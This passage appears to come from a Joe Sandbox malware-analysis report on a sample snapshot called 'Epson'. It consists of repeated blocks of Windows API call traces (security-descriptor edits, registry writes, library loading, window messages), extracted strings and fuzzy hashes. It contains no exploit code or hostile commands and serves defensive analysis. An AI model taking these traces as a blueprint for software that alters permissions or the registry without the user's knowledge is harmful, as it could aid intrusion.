                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FB1829
                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00FB1830
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FB185F
                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FB1881
                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FB1893
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FB18BA
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00FB18C1
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FB18CA
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00FB18D1
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FB18DA
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00FB18E1
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB18ED
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00FB18F4
                                                                                                                                                                                                                                        • Part of subcall function 00FB1ADF: GetProcessHeap.KERNEL32(00000008,00FB14FD,?,00000000,?,00FB14FD,?), ref: 00FB1AED
                                                                                                                                                                                                                                        • Part of subcall function 00FB1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00FB14FD,?), ref: 00FB1AF4
                                                                                                                                                                                                                                        • Part of subcall function 00FB1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00FB14FD,?), ref: 00FB1B03
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4175595110-0
                                                                                                                                                                                                                                      • Opcode ID: 82f19f8aac16b16f191f8cae63468917e4d9cd1e667c7ac2ba09f8ca778116ec
                                                                                                                                                                                                                                      • Instruction ID: bb5cf94ccefa95de4234fcd5b1111fef2e81eaf0e0452ae8d4f6c58e7c5f32f4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82f19f8aac16b16f191f8cae63468917e4d9cd1e667c7ac2ba09f8ca778116ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F7148B2D01209AFDB10DFA6DC84FEEBBB8BF04310F544225E915AA191D735DA05DFA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FDCF1D
                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00FEDCD0,00000000,?,00000000,?,?), ref: 00FDCFA4
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00FDD004
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FDD054
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FDD0CF
                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00FDD112
                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00FDD221
                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00FDD2AD
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00FDD2E1
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FDD2EE
                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00FDD3C0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                      • API String ID: 9721498-966354055
                                                                                                                                                                                                                                      • Opcode ID: eab911cb33044ca319dfbb7a559c6a2f84a057206f7122e02a901077fa3a585b
                                                                                                                                                                                                                                      • Instruction ID: 8f77f9b811b611f129358b2240c1324245470d2698385597976f7b571078242d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eab911cb33044ca319dfbb7a559c6a2f84a057206f7122e02a901077fa3a585b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC126A356042019FD715DF14C881B2AB7E6FF88724F08885DF98A9B3A2CB35ED46DB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00FE1462
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE149D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FE14F0
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE1526
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE15A2
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE161D
                                                                                                                                                                                                                                        • Part of subcall function 00F6FD52: _wcslen.LIBCMT ref: 00F6FD5D
                                                                                                                                                                                                                                        • Part of subcall function 00FB3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FB3547
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                      • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                      • Opcode ID: a0a230951ecdb68503771ed50e8ba672c67e17c720a674b72b5a4a83c77527e4
                                                                                                                                                                                                                                      • Instruction ID: eebda14ef85bec7c2dc166e2fd31456eb5c454fc4844d8445149978fcd7944e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0a230951ecdb68503771ed50e8ba672c67e17c720a674b72b5a4a83c77527e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BE1D2326043818FC714EF26C85096AB7E2FF94354F14895DF8969B361DB34EE49EB81
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                      • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                      • Opcode ID: ceab400908808d9be0ea9a117c37dc4c746c10e376cf1922e054b14d0dc1027d
                                                                                                                                                                                                                                      • Instruction ID: ccd2a284097803331c3ff28fe88651107b9f3cdac0376db2ebd459be93f9506e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceab400908808d9be0ea9a117c37dc4c746c10e376cf1922e054b14d0dc1027d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6371D533A0011A8BCB10DF7CDD506BB33A3AF61768B1D4127EC569B394EA39DE54A790
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE8DB5
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE8DC9
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE8DEC
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE8E0F
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FE8E4D
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00FE6691), ref: 00FE8EA9
                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FE8EE2
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00FE8F25
                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FE8F5C
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00FE8F68
                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FE8F78
                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,00FE6691), ref: 00FE8F87
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FE8FA4
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FE8FB0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                      • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                      • Opcode ID: 908d8cb84ab64d81da7ffca376ff1a69321befe3f0805a1f9323596b13cb7645
                                                                                                                                                                                                                                      • Instruction ID: 1b48cc23868cc59033476b1b0729d4eb3d17f10072a47c564b676a3f38dd18ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 908d8cb84ab64d81da7ffca376ff1a69321befe3f0805a1f9323596b13cb7645
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97610471900258BFEB14EF65CC41BBE77A8FF08B60F108106F919DA0D1DB75A951EBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00FC493D
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC4948
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC499F
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC49DD
                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00FC4A1B
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FC4A63
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FC4A9E
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FC4ACC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                      • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                      • Opcode ID: 6b615c80562f7864a54261530ac7d68d8632526fb6b5c624060b9b5437188aaf
                                                                                                                                                                                                                                      • Instruction ID: 8f13089a723cfde6ee0a5923b36d75001046ae0ea29fe1db73096ab148dbf616
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b615c80562f7864a54261530ac7d68d8632526fb6b5c624060b9b5437188aaf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8471E232A042169FC310EF24CD51A6BB7E4FF94768F00492DF89697261EB39ED49DB81
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00FB6395
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FB63A7
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00FB63BE
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00FB63D3
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00FB63D9
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FB63E9
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00FB63EF
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FB6410
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FB642A
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00FB6433
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FB649A
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00FB64D6
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00FB64DC
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00FB64E3
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00FB653A
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00FB6547
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00FB656C
                                                                                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FB6596
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 895679908-0
                                                                                                                                                                                                                                      • Opcode ID: d81d5a2d79cd65db93f7535d2ee05ae7e308cd08335a98692c3c6b0ea9d6cc19
                                                                                                                                                                                                                                      • Instruction ID: 6e17c19025d89652a4f0fdd8504c580cf0a6073c8746e04efe5eb66e8b815a68
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d81d5a2d79cd65db93f7535d2ee05ae7e308cd08335a98692c3c6b0ea9d6cc19
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6719D31900609EFDB20DFA9CE85AAEBBF5FF48714F100518E186E66A0C779E940EF10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00FD0884
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00FD088F
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00FD089A
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00FD08A5
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00FD08B0
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00FD08BB
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00FD08C6
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00FD08D1
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00FD08DC
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00FD08E7
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00FD08F2
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00FD08FD
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00FD0908
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00FD0913
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00FD091E
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00FD0929
                                                                                                                                                                                                                                      • GetCursorInfo.USER32(?), ref: 00FD0939
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00FD097B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215588206-0
                                                                                                                                                                                                                                      • Opcode ID: fde9a91e28b460537820a271ae8e535a42c26307feae38893983e209a127b48d
                                                                                                                                                                                                                                      • Instruction ID: 284800eea5f6818e0a5873e4774f92af7d47fe2b34585095831fa05f95dafe67
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fde9a91e28b460537820a271ae8e535a42c26307feae38893983e209a127b48d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B84185B0D083196ADB10DFBA8C8595EBFE9FF04360B54452AE11CEB381DA78D901CF91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F70436
                                                                                                                                                                                                                                        • Part of subcall function 00F7045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0102170C,00000FA0,CAE51BB8,?,?,?,?,00F92733,000000FF), ref: 00F7048C
                                                                                                                                                                                                                                        • Part of subcall function 00F7045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F92733,000000FF), ref: 00F70497
                                                                                                                                                                                                                                        • Part of subcall function 00F7045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F92733,000000FF), ref: 00F704A8
                                                                                                                                                                                                                                        • Part of subcall function 00F7045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F704BE
                                                                                                                                                                                                                                        • Part of subcall function 00F7045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F704CC
                                                                                                                                                                                                                                        • Part of subcall function 00F7045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F704DA
                                                                                                                                                                                                                                        • Part of subcall function 00F7045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F70505
                                                                                                                                                                                                                                        • Part of subcall function 00F7045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F70510
                                                                                                                                                                                                                                      • ___scrt_fastfail.LIBCMT ref: 00F70457
                                                                                                                                                                                                                                        • Part of subcall function 00F70413: __onexit.LIBCMT ref: 00F70419
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F70492
                                                                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 00F704D2
                                                                                                                                                                                                                                      • InitializeConditionVariable, xrefs: 00F704B8
                                                                                                                                                                                                                                      • kernel32.dll, xrefs: 00F704A3
                                                                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 00F704C4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                      • Opcode ID: 935934ec5b9a4c3166a40426b2f3dda19a3d4b2560fa41b2cc4b7cfddef07c61
                                                                                                                                                                                                                                      • Instruction ID: 0c3e92e6f7bd65208d7bf02f96b62a4fe2a9ab048a5b0893157e9d683257ee71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 935934ec5b9a4c3166a40426b2f3dda19a3d4b2560fa41b2cc4b7cfddef07c61
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49210E32A40759EBD7205FA4AC45B6D37A4EF44B75F04812BF9099B690DFB8DC00BA53
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
